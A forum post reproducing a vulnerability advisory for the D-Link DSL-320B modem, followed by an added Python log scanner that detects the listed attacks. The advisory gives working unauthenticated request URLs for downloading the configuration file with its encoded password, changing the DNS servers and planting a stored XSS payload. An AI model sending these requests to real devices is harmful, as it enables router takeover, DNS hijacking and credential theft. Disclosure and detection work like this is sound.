dlavager
07.05.2013, 10:47
D-Link DSL-320B Authentication Bypass / Cross Site Scripting
http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem
Access to the config file without authentication => full authentication bypass possible! :) (1)
192.168.178.111/config.bin
=======
=======
=>sysPassword is Base64 encoded
*Access to the logfile without authentication: (1)
192.168.178.111/status/status_log.sys
*Change the DNS settings without authentication: (1)
http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2
*Stored XSS within parental control(2):
=>Parameter:set/bwlist/entry:1/hostname
Request:
http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1
Again you are able to place this XSS without authentication. :)
*Login credentials in HTTP GET are not a good idea => use HTTP POST! (3)
http://192.168.178.111/login.xgi?user=admin&pass=admin1
*Credentials in HTTP GET via password change request are not a good idea => use HTTP POST! (3)
http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1
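Added example, not part of the original advisory: a log scanner that flags requests matching the issues listed above (config/log file download, DNS change, markup in the parental-control hostname, credentials in the query string) and redacts the credentials before an alert is stored. It assumes request logs from a proxy or monitor in front of the modem's web interface; the log format, finding names and sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths and parameter names below come from the advisory text.
UNAUTH_FILES = {"/config.bin", "/status/status_log.sys"}
SECRET_KEYS = {"pass", "set/sys/account/user/oldpwd",
               "set/sys/account/user/password"}
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return (sorted findings, target with secret values redacted)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    findings, kept = set(), []
    if path in UNAUTH_FILES:
        findings.add("config-or-log-download")
    for raw in filter(None, parts.query.split("&")):
        key, _, value = raw.partition("=")
        name = unquote(key).lower()
        if path.endswith("/adv_dns.xgi") and name.startswith("set/dns/"):
            findings.add("dns-change")
        if name.endswith("/hostname") and MARKUP.search(unquote(value)):
            findings.add("markup-in-hostname")
        if name in SECRET_KEYS:
            findings.add("credential-in-url")
            raw = key + "=REDACTED"  # keep the secret out of stored alerts
        kept.append(raw)
    return sorted(findings), parts._replace(query="&".join(kept)).geturl()

def scan(lines):
    """Yield (line number, findings, redacted target) for flagged requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings, redacted = classify(match.group(1)) if match else ([], "")
        if findings:
            yield number, findings, redacted

# Constructed sample log lines (hypothetical proxy format, not from the page).
SAMPLE = [
    '10.0.0.9 [07/May/2013:10:00:02] "GET /config.bin HTTP/1.1" 200',
    '10.0.0.9 [07/May/2013:10:00:03] "GET /advanced/adv_dns.xgi?&SET/dns/mode=0 HTTP/1.1" 200',
    '10.0.0.9 [07/May/2013:10:00:04] "GET /home/home_parent.xgi?&set/bwlist/entry:1/hostname=%22%3E%3Cb%3E HTTP/1.1" 200',
    '10.0.0.5 [07/May/2013:10:00:05] "GET /home/home_parent.xgi?&set/bwlist/entry:1/hostname=kids-pc HTTP/1.1" 200',
    '10.0.0.5 [07/May/2013:10:00:06] "GET /login.xgi?user=admin&pass=admin1 HTTP/1.1" 200',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```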